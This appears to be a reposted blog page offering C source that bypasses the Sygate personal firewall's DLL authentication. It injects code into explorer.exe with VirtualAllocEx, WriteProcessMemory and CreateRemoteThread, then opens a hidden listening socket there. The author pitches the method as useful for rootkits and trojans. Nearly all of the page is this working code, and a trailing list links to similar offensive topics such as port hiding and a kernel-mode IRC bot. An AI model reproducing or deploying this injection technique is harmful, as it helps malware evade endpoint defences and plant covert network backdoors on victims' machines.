bypass dll authentication in sygate and such
来源:互联网 发布:鑫园合影软件 编辑:程序博客网 时间:2024/04/30 14:10
sygate uses a very 'spiff' method that limits injecting a dll into a process, a popular method for rootkits and trojans alike. this is just some example code to bypass sygate dll authentication, its very simple, but its just to get the concept across. It functions by allocating a function in a remote application (in this example, explorer.exe) and then executes the thread. the thread then sets up a listening socket, all of which should get bypass sygate's dll authenication.
I'm not a big fan of commenting, so if you have any questions, just provide me with the line and i will explain it
#define WIN32_LEAN_AND_MEAN
#include
#include
#include
#include
#include
typedef int (WSAAPI *LPWSAStartup)( IN WORD wVersionRequested, OUT LPWSADATA lpWSAData );
typedef SOCKET (WSAAPI *LPsocket)( IN int af, IN int type, IN int protocol );
typedef int (WSAAPI *LPbind)( IN SOCKET s, IN const struct sockaddr FAR * name, IN int namelen );
typedef int (WSAAPI *LPlisten)( IN SOCKET s, IN int backlog );
typedef SOCKET (WSAAPI *LPaccept)( IN SOCKET s, OUT struct sockaddr FAR * addr, IN OUT int FAR * addrlen );
typedef int (WSAAPI *LPclosesocket)( IN SOCKET s );
typedef int (WSAAPI *LPsend)( IN SOCKET s, IN const char FAR * buf, IN int len, IN int flags );
typedef HMODULE (WINAPI *LPLoadLibrary)( IN LPCSTR lpLibFileName );
typedef FARPROC (WINAPI *LPGetProcAddress)( IN HMODULE hModule, IN LPCSTR lpProcName );
typedef struct _INJINFO
{
char c_Lib[16];
char c_WSAStartup[12];
char c_Socket[8];
char c_Bind[8];
char c_Listen[8];
char c_Accept[8];
char c_CloseSocket[16];
char c_send[8];
char c_data[45];
LPLoadLibrary LoadLib;
LPGetProcAddress GetProcAddr;
} INJINFO, *PINJINFO;
static DWORD WINAPI ThreadProc( LPVOID lpParams )
{
PINJINFO info = (PINJINFO)lpParams;
HMODULE hLib = info->LoadLib( info->c_Lib );
LPWSAStartup wsastartup = (LPWSAStartup)info->GetProcAddr( hLib, info->c_WSAStartup );
LPsocket wsasocket = (LPsocket)info->GetProcAddr( hLib, info->c_Socket );
LPbind wsabind = (LPbind)info->GetProcAddr( hLib, info->c_Bind );
LPlisten wsalisten = (LPlisten)info->GetProcAddr( hLib, info->c_Listen );
LPaccept wsaaccept = (LPaccept)info->GetProcAddr( hLib, info->c_Accept );
LPclosesocket wsaclosesocket = (LPclosesocket)info->GetProcAddr( hLib, info->c_CloseSocket );
LPsend wsasend = (LPsend)info->GetProcAddr( hLib, info->c_send );
SOCKADDR_IN sAddr;
sAddr.sin_addr.s_addr = INADDR_ANY;
sAddr.sin_port = 0xDEAD;
sAddr.sin_family = AF_INET;
WSADATA wsa;
wsastartup( 0x0202, &wsa );
SOCKET ServerSocket = wsasocket( AF_INET, SOCK_STREAM, IPPROTO_TCP );
wsabind( ServerSocket, (LPSOCKADDR)&sAddr, sizeof(sAddr) );
wsalisten( ServerSocket, 5 );
SOCKET cli;
while (true)
{
cli = wsaaccept( ServerSocket, NULL, NULL );
if ( cli == SOCKET_ERROR )
break;
wsasend( cli, info->c_data, 45, 0 );
}
wsaclosesocket( ServerSocket );
return 0;
}
static void __declspec( naked ) end_proc()
{
}
INJINFO info =
{
"ws2_32.dll",
"WSAStartup",
"socket",
"bind",
"listen",
"accept",
"closesocket",
"send",
"slutted",
NULL,
NULL
};
int main(int argc, char* argv[])
{
HMODULE hLib = LoadLibrary( "kernel32.dll" );
info.LoadLib = (LPLoadLibrary)GetProcAddress( hLib, "LoadLibraryA" );
info.GetProcAddr = (LPGetProcAddress)GetProcAddress( hLib, "GetProcAddress" );
DWORD dwPID;
GetWindowThreadProcessId( FindWindow( "Shell_TrayWnd", NULL ), &dwPID );
printf( "explorer pid: 0x%x/n", dwPID );
HANDLE hProcess = OpenProcess( PROCESS_ALL_ACCESS, FALSE, dwPID );
if ( hProcess == NULL )
{
printf( "error opening process/n" );
return 0;
}
DWORD ProcSize = (DWORD)end_proc - (DWORD)ThreadProc;
printf( "proc size: %u/n", ProcSize );
LPVOID lpProc = VirtualAllocEx( hProcess, NULL, ProcSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
LPVOID lpParams = VirtualAllocEx( hProcess, NULL, 1024, MEM_COMMIT, PAGE_READWRITE );
if ( !lpProc || !lpParams )
{
printf( "error allocating mem/n" );
return 0;
}
printf( "memory allocated at 0x%X and 0x%X/n", lpProc, lpParams );
DWORD dwWritten;
WriteProcessMemory( hProcess, lpProc, ThreadProc, ProcSize, &dwWritten );
WriteProcessMemory( hProcess, lpParams, &info, sizeof( info ), &dwWritten );
printf( "memory written/n" );
DWORD ThreadID;
HANDLE hThread = CreateRemoteThread( hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)lpProc, lpParams, 0, &ThreadID );
if ( hThread == NULL )
{
printf( "error creating thread/n" );
}
else
{
WaitForSingleObject( hThread, INFINITE );
}
VirtualFreeEx( hProcess, lpProc, ProcSize, MEM_DECOMMIT );
VirtualFreeEx( hProcess, lpParams, 1024, MEM_DECOMMIT );
printf( "done/n" );
return 0;
}
- bypass dll authentication in sygate and such
- Huawei HG866 Authentication Bypass
- Authorization and Authentication In Hadoop
- Universal DEP/ASLR bypass with msvcr71.dll and mona.py
- IBM Lotus Domino Authentication Bypass
- NGS00138 Technical Advisory: Websense Triton 7.6 - authentication bypass in report management UI
- Sygate
- Authentication in HDFS and Hadoop common
- Multiple Products Cookie Authentication Bypass Vulnerability
- Oracle Database Authentication Protocol Security Bypass
- AppScan-Authentication Bypass Using HTTP Verb Tampering
- safe mode bypass and rooting
- Beyond SQLi: Obfuscate and Bypass
- Beyond SQLi: Obfuscate and Bypass
- Windows Integrated Authentication in the combination of IIS and Tomcat
- Authentication and Authorization in the Google Data Protocol
- How-to: Enable User Authentication and Authorization in Apache HBase
- Handling session and authentication timeouts in ASP.Net
- ndis hook开发日志(2)-获取网卡信息
- 谈谈我的能力
- 一个SQL自动编号的问题。。。
- Usermode api hook removal
- port/connection hiding
- bypass dll authentication in sygate and such
- 对抗杀毒软件Kick the Heuristic Anti-virus out of the Rootkit
- OS X的缺省 java classpath
- 嗨,睡觉吧,如果让猪猪知道了还不知道怎么生气呢,反正就是睡不着。
- 再也不随便提供email了
- Kernel Mode Ircbot
- A more stable way to locate real KiServiceTable
- WebObjects = 10 岁
- Rose2001的新特性